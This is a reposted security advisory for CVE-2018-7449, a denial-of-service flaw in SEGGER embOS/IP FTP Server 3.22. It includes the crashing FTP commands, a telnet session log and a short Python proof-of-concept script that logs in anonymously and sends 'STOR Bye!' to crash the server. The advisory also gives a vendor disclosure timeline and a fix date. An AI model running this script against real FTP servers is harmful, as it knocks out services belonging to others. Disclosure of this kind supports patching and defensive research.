首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SEGGER embOS/IP FTP Server 3.22 - Denial of Service
来源:hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2018-03-05  
[+] Credits: John Page (aka hyp3rlinx)     
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security         
 
 
 
Vendor:
=============
www.segger.com
 
 
Product:
===========
embOS/IP FTP Server v3.22
 
 
Vulnerability Type:
===================
FTP Commands Denial Of Service
 
 
 
CVE Reference:
==============
CVE-2018-7449
 
 
Security Issue:
================
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash)
via an invalid LIST, STOR, or RETR command.
 
STOR 666\r\n
LIST\r\n
RETR '+'..\\'*8+'Windows\system.ini\r\n
 
 
TELNET x.x.x.x 21
 
220 Welcome to embOS/IP FTP server
USER anonymous
331 Password required.
PASS anonymous
230 User logged in, proceed.
STOR Bye!
 
CRASH!!!
 
 
 
Exploit/POC:
=============
import socket,time
 
VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ')
USR='anonymous'
PWD='anonymous'
CMD="STOR Bye!\r\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((VICTIM, 21))
print s.recv(1024) # Recieve FTP Banner
time.sleep(1)
s.send("USER " + USR+ "\r\n")
print s.recv(1024)
time.sleep(1)
s.send("PASS "+ PWD+"\r\n") #
print s.recv(1024)
time.sleep(1)
s.send(CMD)
print 'Sent %s' % CMD
s.close()
 
 
 
 
Network Access:
===============
Remote
 
 
 
Severity:
=========
Medium
 
 
 
Disclosure Timeline:
=============================
Vendor Notification:  February 17, 2018
Vendor acknowledgement: February 19, 2018
Vendor released fixed version v3.22a : February 23, 2018
March 1, 2018 : Public Disclosure
 
 
 
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IrfanView 4.50 Email Plugin -
·DualDesk 20 - 'Proxy.exe' Deni
·IrfanView 4.44 Email Plugin -
·NETGEAR Magic telnetd Enabler
·ActivePDF Toolkit Code Executi
·Papenmeier WiFi Baby Monitor F
·Sony Playstation 4 (PS4) 4.07
·Xion 1.0.125 - '.m3u' Local SE
·Apple iOS 11.2.5 / watchOS 4.2
·Dup Scout Enterprise 10.5.12 -
·Concrete5 < 8.3.0 - Username /
·Sophos UTM 9.410 - 'loginuser'
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved